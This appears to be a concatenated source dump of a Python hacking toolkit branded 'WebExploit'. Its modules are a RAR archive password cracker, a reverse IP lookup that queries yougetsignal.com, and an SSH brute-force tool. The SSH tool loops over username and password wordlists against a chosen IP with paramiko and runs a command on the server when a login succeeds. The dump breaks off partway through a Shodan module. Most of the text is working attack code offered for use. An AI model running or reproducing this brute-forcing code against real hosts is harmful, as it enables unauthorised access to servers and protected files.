7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | 'pip install google-search'
26 | try:
27 | import time as t
28 | from colorama import Fore as f
29 | import sys, os
30 | import rarfile
31 | from random import choice
32 | except:
33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
34 | t.sleep(1)
35 | sys.exit()
36 |
37 | black = "\033[0;30m"
38 | red = "\033[0;31m"
39 | green = "\033[0;32m"
40 | brown = "\033[0;33m"
41 | blue = "\033[0;34m"
42 | purple = "\033[0;35m"
43 | cyan = "\033[0;36m"
44 | l_gray = "\033[0;37m"
45 | dark_gray = "\033[1;30m"
46 | l_red = "\033[1;31m"
47 | l_green = "\033[1;32m"
48 | yellow = "\033[1;33m"
49 | l_blue = "\033[1;34m"
50 | l_purple = "\033[1;35m"
51 | l_cyan = "\033[1;36m"
52 | l_white = "\033[1;37m"
53 | faint = "\033[2m"
54 | italic = "\033[3m"
55 | underline = "\033[4m"
56 | blink = "\033[5m"
57 | nefative = "\033[7m"
58 | cross = "\033[9m"
59 | ended = "\033[0m"
60 | bold = "\033[1m"
61 | nbold = "\033[0m"
62 | white = f.WHITE
63 |
64 | bnr = ['''
65 | ░▒█▀▀▄░░░█▀▀▄░░░▒█▀▀▄░░░░░░░░▒█▀▀▄
66 | ░▒█▄▄▀░░▒█▄▄█░░░▒█▄▄▀░░░▄▄░░░▒█░░░
67 | ░▒█░▒█░░▒█░▒█░░░▒█░▒█░░░▀▀░░░▒█▄▄▀ ''', '''
68 | __ _ __ _
69 | )_) )_) )_) / `
70 | / \ / / / \ o (_ ''']
71 |
72 | def r_bnr(bnr):
73 | return choice(bnr)
74 |
75 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
76 | t.sleep(2)
77 | print(f' {italic}From{ended} : ', end='')
78 | #create flush text [simple]
79 | print(f'{red}{bold}', end='', flush=True)
80 | print(f'{bold}W', end='', flush=True)
81 | t.sleep(0.5)
82 | print('e', end='', flush=True)
83 | t.sleep(0.7)
84 | print('b', end='', flush=True)
85 | t.sleep(0.4)
86 | print('E', end='', flush=True)
87 | t.sleep(0.1)
88 | print('x', end='', flush=True)
89 | t.sleep(0.2)
90 | print('p', end='', flush=True)
91 | t.sleep(0.3)
92 | print('l', end='', flush=True)
93 | t.sleep(0.4)
94 | print('o', end='', flush=True)
95 | t.sleep(0.5)
96 | print('i', end='', flush=True)
97 | t.sleep(1.5)
98 | print(f't{ended}', flush=True)
99 | nbold = "\033[0m" # tahe koskholi !
100 | t.sleep(1)
101 | print(f'{white}{nbold}')
102 |
103 | print (f'\n {bold}{f.GREEN}[{f.WHITE}RAR{f.GREEN}]{f.WHITE}{f.RED} R.A.R{f.WHITE}{bold} RAR {bold}C{nbold}racker T00L !\n\n\n')
104 | t.sleep(3)
105 |
106 |
107 |
108 |
109 | while True:
110 | try:
111 | rarc = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}R.A.R/{bold}FILE[rar]{nbold}{f.WHITE} enter {bold}\'RarFile{nbold}\' [ex: /Desktop/mji.rar]:#{f.GREEN}{bold} ')
112 | print(f'{nbold}')
113 |
114 | if rarc:
115 | break
116 | else:
117 | input('please enter a RAR file')
118 | continue
119 |
120 | except Exception as err_rarc:
121 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}ERROR -> {err_rarc}{nbold} EXITTING . . .')
122 | t.sleep(2)
123 | # break
124 | sys.exit(0)
125 | while True:
126 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}R.A.R/{bold}RAR-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/passlist_example.txt]:#{f.GREEN}{bold} ')
127 | if passwords:
128 | try:
129 | passes = open(passwords, 'r').read().split()
130 | # passes.close()
131 | break
132 | except Exception as file_err:
133 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}RARC/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n')
134 | t.sleep(1)
135 | continue
136 | t.sleep(1)
137 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}ZIP-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}rar-cracker . . . !{nbold}]')
138 | t.sleep(3)
139 |
140 | try:
141 | with rarfile.RarFile(rarc) as rf:
142 | for pwd_ in passes:
143 | try:
144 | rf.extractall(pwd=pwd_.encode()) #strip()
145 | print (f'\n {nbold}{f.WHITE}[{f.GREEN}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}RAR.C/{f.GREEN}Password-Found{white}] {nbold}{f.CYAN} \'{bold}{pwd_}{nbold}\' \n')
146 | break
147 | except:
148 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}RAR.C/{f.YELLOW}Password-NotFound{white}] {nbold}{f.RED} \'{bold}{pwd_}{nbold}\' \n')
149 | continue
150 | except:
151 | pass
152 |
153 |
154 |
155 | # with rarfile.RarFile(rarc) as rf:
156 | # for password in passes:
157 | # try:
158 | # rf.extractall(pwd=password.encode())
159 | # return password
160 | # except:
161 | # pass
162 |
--------------------------------------------------------------------------------
/cores/ril.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | method = ""
26 | #import re
27 | # reverse ip lookup ril
28 | import time as t
29 | from colorama import Fore as f
30 | from random import choice
31 | import sys, os
32 | import requests as r
33 | import json as j
34 | from fake_useragent import UserAgent
35 | agent = UserAgent()
36 | from fake_headers import Headers
37 |
38 |
39 | black = "\033[0;30m"
40 | red = "\033[0;31m"
41 | green = "\033[0;32m"
42 | brown = "\033[0;33m"
43 | blue = "\033[0;34m"
44 | purple = "\033[0;35m"
45 | cyan = "\033[0;36m"
46 | l_gray = "\033[0;37m"
47 | dark_gray = "\033[1;30m"
48 | l_red = "\033[1;31m"
49 | l_green = "\033[1;32m"
50 | yellow = "\033[1;33m"
51 | l_blue = "\033[1;34m"
52 | l_purple = "\033[1;35m"
53 | l_cyan = "\033[1;36m"
54 | l_white = "\033[1;37m"
55 | faint = "\033[2m"
56 | italic = "\033[3m"
57 | underline = "\033[4m"
58 | blink = "\033[5m"
59 | nefative = "\033[7m"
60 | cross = "\033[9m"
61 | ended = "\033[0m"
62 | bold = "\033[1m"
63 | nbold = "\033[0m"
64 | white = f.WHITE
65 | bnr = ['''
66 |
67 | ▀███▀▀▀██▄ ▀████▀ ▀████▀
68 | ██ ▀██▄ ██ ██
69 | ██ ▄██ ██ ██
70 | ▓██████ ██ ██
71 | ▓█ ██▄ █▓ █▓ ▄
72 | ▓█ ▀▓█ █▓ █▓ ▒█
73 | ▓█ ▓ ▓▓ ▓▓ ▓▓ ▓
74 | ▓▓ ▀▓▓▓ ▒▓ ▓▒ ▓▓
75 | ▒ ▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ▒ ▒▒ ▓▒ ▒ ''', '''
76 | ██▀███ ██ ██▓
77 | ▓██ ▒ ██▒ ▒▓██ ▓██▒
78 | ▓██ ░▄█ ▒ ░▒██ ▒██░
79 | ▒██▀▀█▄ ░██ ▒██░
80 | ░██▓ ▒██▒ ░██ ░██████
81 | ░ ▒▓ ░▒▓░ ░▓ ░ ▒░▓
82 | ░▒ ░ ▒░ ▒ ░ ░ ▒
83 | ░ ░ ▒ ░ ░
84 | ░ ░ ░ ''']
85 |
86 | def r_bnr(bnr):
87 | return choice(bnr)
88 |
89 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
90 | t.sleep(2)
91 | print(f' {italic}From{ended} : ', end='')
92 | #create flush text [simple]
93 | print(f'{red}{bold}', end='', flush=True)
94 | print(f'{bold}W', end='', flush=True)
95 | t.sleep(0.5)
96 | print('e', end='', flush=True)
97 | t.sleep(0.7)
98 | print('b', end='', flush=True)
99 | t.sleep(0.4)
100 | print('E', end='', flush=True)
101 | t.sleep(0.1)
102 | print('x', end='', flush=True)
103 | t.sleep(0.2)
104 | print('p', end='', flush=True)
105 | t.sleep(0.3)
106 | print('l', end='', flush=True)
107 | t.sleep(0.4)
108 | print('o', end='', flush=True)
109 | t.sleep(0.5)
110 | print('i', end='', flush=True)
111 | t.sleep(1.5)
112 | print(f't{ended}', flush=True)
113 | nbold = "\033[0m" # tahe koskholi !
114 | t.sleep(1)
115 |
116 |
117 |
118 | print (f'\n {bold}{f.GREEN}[{f.WHITE}RIL{f.GREEN}]{f.WHITE}{f.RED} R.I.L{f.WHITE}{nbold} {bold}R{nbold}everce {bold}I{nbold}p {bold}L{nbold}ookup tool !\n\n\n')
119 | t.sleep(2)
120 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}R.I.L/{f.CYAN}{bold}REVERCE IP LOOKUP]{white} advanced tool for find sites on a host {red}{bold} RIL {nbold}{white} tool !\n')
121 |
122 | while True:
123 | try:
124 | ur = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}R.I.L/{bold}URL{nbold}{f.WHITE} enter {bold}\'URL or IP{nbold}\' [ex: GOOGLE.com, 1.1.1.1]:#{f.GREEN}{bold} ')
125 | print(f'{nbold}')
126 |
127 | if ur:
128 | break
129 | else:
130 | continue
131 |
132 | except KeyboardInterrupt:
133 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
134 | t.sleep(2)
135 | # break
136 | sys.exit(0)
137 |
138 | if 'http://' in ur:
139 | try:
140 | url = ur.replace('http://','')
141 | except:
142 | url = ur
143 | if 'https://' in ur:
144 | try:
145 | url = ur.replace('https://','')
146 | except:
147 | url = ur
148 | else:
149 | url = ur
150 |
151 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}RIL/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n')
152 |
153 | t.sleep(3)
154 |
155 | # data = ('remoteAddress='+url+'&key=')
156 | data = {'remoteAddress': url}
157 | leng = data
158 |
159 | lenght = len(leng)
160 |
161 | hed = {'Host': 'domains.yougetsignal.com',
162 | 'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0',
163 | 'Accept': 'text/javascript, text/html, application/xml, text/xml, */*',
164 | 'Accept-Language': 'en-US,en;q=0.5',
165 | 'Accept-Encoding': 'gzip, deflate, br',
166 | 'X-Requested-With': 'XMLHttpRequest',
167 | 'X-Prototype-Version': '1.6.0',
168 | 'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
169 | 'Origin': 'https://www.yougetsignal.com',
170 | 'Connection': 'keep-alive',
171 | 'Content-Length': str(lenght),
172 | 'Referer': 'https://www.yougetsignal.com/',
173 | 'Sec-Fetch-Dest': 'empty',
174 | 'Sec-Fetch-Mode': 'cors',
175 | 'Sec-Fetch-Site': 'same-site'
176 | }
177 | #print (hed)
178 | headers_random = Headers(
179 | browser='firefox', # Generate Chrome , firefox UA
180 | os='win', # Generate Windows, linux platform
181 | headers=True # generate misc headers
182 | ).generate()
183 |
184 |
185 | try:
186 | #r.get('https://domains.yougetsignal.com', headers=header)
187 | result = r.post('https://domains.yougetsignal.com/domains.php', headers=hed, data=data)
188 |
189 | except Exception as error:
190 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}R.I.L/{f.GREEN}REQUEST {nbold}{f.CYAN} BECAUSE: \'{bold}{error}{nbold}\' TRY WITH VPN{nbold}!\n')
191 | t.sleep(3)
192 | sys.exit()
193 | #print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}R.I.L/{f.CYAN}{bold}TRY] trying WITH RANDOM HEADER{green}{bold} REQUEST AGAIN . . .{nbold}{white} !\n')
194 |
195 | #result = r.post('https://domains.yougetsignal.com/domains.php', headers=headers_random, data=data)
196 | #input('enter for show domains')
197 | res = result.text
198 | ril = j.loads(res)
199 |
200 | status = ril['status']
201 | method = ril["resultsMethod"]
202 | LastScrape = ril["lastScrape"]
203 | domains_count = ril["domainCount"]
204 | remote_address = ril["remoteAddress"]
205 | domains = ril["domainArray"]
206 | try:
207 | mesg = ril["message"]
208 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}R.I.L/{f.YELLOW}ERROR {nbold}{f.CYAN} BECAUSE: \'{bold}{mesg}{nbold}\' TRY WITH VPN {nbold}!\n')
209 | sys.exit()
210 | except:
211 | pass
212 |
213 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}STATUS{nbold}{f.WHITE} >>> {bold}{green}{bold}{status}{nbold}')
214 | t.sleep(0.5)
215 | #print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}METHOD{nbold}{f.WHITE} >>> {bold}{green}{bold}{method}{nbold}')
216 | t.sleep(0.5)
217 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LAST-SCRAPE{nbold}{f.WHITE} >>> {bold}{green}{bold}{LastScrape}{nbold}')
218 | t.sleep(0.5)
219 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}DOMAINS-COUNT{nbold}{f.WHITE} >>> {bold}{green}{bold}{domains_count}{nbold}')
220 | t.sleep(0.5)
221 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}REMOTE-ADDRESS{nbold}{f.WHITE} >>> {bold}{green}{bold}{remote_address}{nbold}')
222 | t.sleep(0.5)
223 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ALL DOMAINS{bold}{f.WHITE} ::: {bold}{green}{bold}')
224 |
225 | t.sleep(2)
226 | print(f"{italic}{yellow}-+-" * 10)
227 | for d, u in domains:
228 | print (f' {f.WHITE}{nbold}[{italic}{f.RED}WebExploit{nbold}{f.WHITE}@{red}R.I.L/{blue}domains{white}] {yellow} × {d} ×')
229 | t.sleep(0.09)
230 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}R.I.L/{f.CYAN}{bold}Domains{white}]{italic} The WebExploit Founded {red}{bold} {domains_count} {nbold}{white} on {bold}{url}\n\n')
231 |
232 |
233 |
234 |
235 |
236 |
--------------------------------------------------------------------------------
/cores/ssc.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | 'pip install google-search'
26 | try:
27 | import time as t
28 | from colorama import Fore as f
29 | import sys, os
30 | import requests as r
31 | import paramiko
32 | from random import choice
33 | except:
34 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
35 | t.sleep(1)
36 | sys.exit()
37 |
38 | black = "\033[0;30m"
39 | red = "\033[0;31m"
40 | green = "\033[0;32m"
41 | brown = "\033[0;33m"
42 | blue = "\033[0;34m"
43 | purple = "\033[0;35m"
44 | cyan = "\033[0;36m"
45 | l_gray = "\033[0;37m"
46 | dark_gray = "\033[1;30m"
47 | l_red = "\033[1;31m"
48 | l_green = "\033[1;32m"
49 | yellow = "\033[1;33m"
50 | l_blue = "\033[1;34m"
51 | l_purple = "\033[1;35m"
52 | l_cyan = "\033[1;36m"
53 | l_white = "\033[1;37m"
54 | faint = "\033[2m"
55 | italic = "\033[3m"
56 | underline = "\033[4m"
57 | blink = "\033[5m"
58 | nefative = "\033[7m"
59 | cross = "\033[9m"
60 | ended = "\033[0m"
61 | bold = "\033[1m"
62 | nbold = "\033[0m"
63 | white = f.WHITE
64 |
65 | bnr = ['''
66 | ██████ ██████ ▄████▄
67 | ▒██ ▒ ▒██ ▒ ▒██▀ ▀█
68 | ░ ▓██▄ ░ ▓██▄ ▒▓█ ▄
69 | ▒ ██▒ ▒ ██▒ ▒▓▓▄ ▄██
70 | ▒██████▒▒ ▒██████▒▒ ▒ ▓███▀
71 | ▒ ▒▓▒ ▒ ░ ▒ ▒▓▒ ▒ ░ ░ ░▒ ▒
72 | ░ ░▒ ░ ░ ░▒ ░ ░ ▒
73 | ░ ░ ░ ░ ░ ░ ░
74 | ░ ░ ░ ░ ''', '''
75 | ░▒█▀▀▀█░░░▒█▀▀▀█░░░▒█▀▀▄
76 | ░░▀▀▀▄▄░░░░▀▀▀▄▄░░░▒█░░░
77 | ░▒█▄▄▄█░░░▒█▄▄▄█░░░▒█▄▄▀ ''']
78 |
79 | def r_bnr(bnr):
80 | return choice(bnr)
81 |
82 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
83 | t.sleep(2)
84 | print(f' {italic}From{ended} : ', end='')
85 | #create flush text [simple]
86 | print(f'{red}{bold}', end='', flush=True)
87 | print(f'{bold}W', end='', flush=True)
88 | t.sleep(0.5)
89 | print('e', end='', flush=True)
90 | t.sleep(0.7)
91 | print('b', end='', flush=True)
92 | t.sleep(0.4)
93 | print('E', end='', flush=True)
94 | t.sleep(0.1)
95 | print('x', end='', flush=True)
96 | t.sleep(0.2)
97 | print('p', end='', flush=True)
98 | t.sleep(0.3)
99 | print('l', end='', flush=True)
100 | t.sleep(0.4)
101 | print('o', end='', flush=True)
102 | t.sleep(0.5)
103 | print('i', end='', flush=True)
104 | t.sleep(1.5)
105 | print(f't{ended}', flush=True)
106 | nbold = "\033[0m" # tahe koskholi !
107 | t.sleep(1)
108 | print(f'{white}{nbold}')
109 |
110 | print (f'\n {bold}{f.GREEN}[{f.WHITE}SSC{f.GREEN}]{f.WHITE}{f.RED} S.S.C{f.WHITE}{bold} SS{nbold}h {bold}C{nbold}racker T00L !\n\n\n')
111 | t.sleep(3)
112 |
113 |
114 |
115 |
116 | while True:
117 | try:
118 | host = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}IP{nbold}{f.WHITE} enter {bold}\'IP{nbold}\' [ex: 1.1.1.1]:#{f.GREEN}{bold} ')
119 | print(f'{nbold}')
120 |
121 | if host:
122 | break
123 | else:
124 | continue
125 |
126 | except KeyboardInterrupt:
127 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
128 | t.sleep(2)
129 | # break
130 | sys.exit(0)
131 | # know = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.WHITE} Are You Know {bold}USERNAME {nbold}? [y > yes | n > no]:#{f.GREEN}{bold} ')
132 |
133 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.YELLOW} If You Know {bold}USERNAME {nbold}Give A File With 1 Username !{white}]')
134 | t.sleep(3)
135 |
136 | while True:
137 | usernames = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.WHITE} enter \'USERNAME LIST{nbold}\' [ex: ssh-users.txt]:#{f.GREEN}{bold} ')
138 | if usernames:
139 | try:
140 | users = open(usernames, 'r').read().split()
141 | # users.close()
142 | break
143 | except Exception as file_err:
144 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.C/{f.GREEN}Usernames{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n')
145 | t.sleep(1)
146 | continue
147 | t.sleep(1)
148 |
149 |
150 | while True:
151 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/ssh-passwords.txt]:#{f.GREEN}{bold} ')
152 | if passwords:
153 | try:
154 | passes = open(passwords, 'r').read().split()
155 | # passes.close()
156 | break
157 | except Exception as file_err:
158 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.C/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n')
159 | t.sleep(1)
160 | continue
161 | t.sleep(1)
162 |
163 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}ssh-cracker . . . !{nbold}]')
164 | t.sleep(3)
165 | try:
166 | client = paramiko.client.SSHClient()
167 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
168 | except Exception as err:
169 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.C/{f.GREEN}Modules-Loader{white}] {nbold}{f.CYAN} ERROR : \'{bold}{err}{nbold}\' \n')
170 | sys.exit()
171 |
172 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}ATTACK{bold} launching ATTACK in{white}]', end='', flush=True)
173 | t.sleep(1)
174 | print (' 5 ', end='', flush=True)
175 | t.sleep(1)
176 | print (' 4 ', end='', flush=True)
177 | t.sleep(1)
178 | print (' 3 ', end='', flush=True)
179 | t.sleep(1)
180 | print (' 2 ', end='', flush=True)
181 | t.sleep(1)
182 | print (' 1 ', end='', flush=True)
183 | t.sleep(1)
184 | print (' 0 ', end='', flush=True)
185 |
186 |
187 | t.sleep(1)
188 |
189 | #print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}USERNAMES-COUNT {white}> > >{bold} {red}{len(str(users))} {white}]\n')
190 | #t.sleep(1)
191 | #print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}PASSWORDS-COUNT {white}> > >{bold} {red}{len(str(passes))} {white}]\n')
192 | #t.sleep(1)
193 | #k = len(int(passes))
194 | #o = len(int(users))
195 | #hits = (k+o)
196 | #print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}HIT-COUNT {white}> > >{bold} {red} {hits} . . .{white}]\n')
197 | t.sleep(3)
198 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}ATTACK{green}{bold} LAUNCH{white}]\n')
199 |
200 | for username in users:
201 | for password in passes:
202 | try:
203 | client.connect(host, username=username, password=password)
204 | _stdin, _stdout,_stderr = client.exec_command("df")
205 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{green}\'{username}{nbold}{white}\' Passowrd: {bold} \'{green}{password}{nbold}{white}\' {bold}{green} SUCESSFULL !')
206 | t.sleep(1)
207 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}{green}INFO{nbold}{f.WHITE} Commaned Exec: {bold}{green}\n{_stdout.read().decode()}')
208 | client.close()
209 | break
210 | sys.exit(0)
211 | except Exception as ssh_error:
212 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{red}\'{username}{nbold}{white}\' Passowrd: {bold} \'{red}{password}{nbold}{white}\' {bold}{red} Not SUCESSFULL ! {nbold}{yellow} Because: {bold}{ssh_error}')
213 | continue
214 |
215 |
216 |
217 |
218 |
219 |
--------------------------------------------------------------------------------
/cores/sse.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | 'pip install google-search'
26 | try:
27 | import time as t
28 | from colorama import Fore as f
29 | import sys, os
30 | from random import choice
31 | import shodan
32 | except:
33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
34 | t.sleep(1)
35 | sys.exit()
36 |
37 | black = "\033[0;30m"
38 | red = "\033[0;31m"
39 | green = "\033[0;32m"
40 | brown = "\033[0;33m"
41 | blue = "\033[0;34m"
42 | purple = "\033[0;35m"
43 | cyan = "\033[0;36m"
44 | l_gray = "\033[0;37m"
45 | dark_gray = "\033[1;30m"
46 | l_red = "\033[1;31m"
47 | l_green = "\033[1;32m"
48 | yellow = "\033[1;33m"
49 | l_blue = "\033[1;34m"
50 | l_purple = "\033[1;35m"
51 | l_cyan = "\033[1;36m"
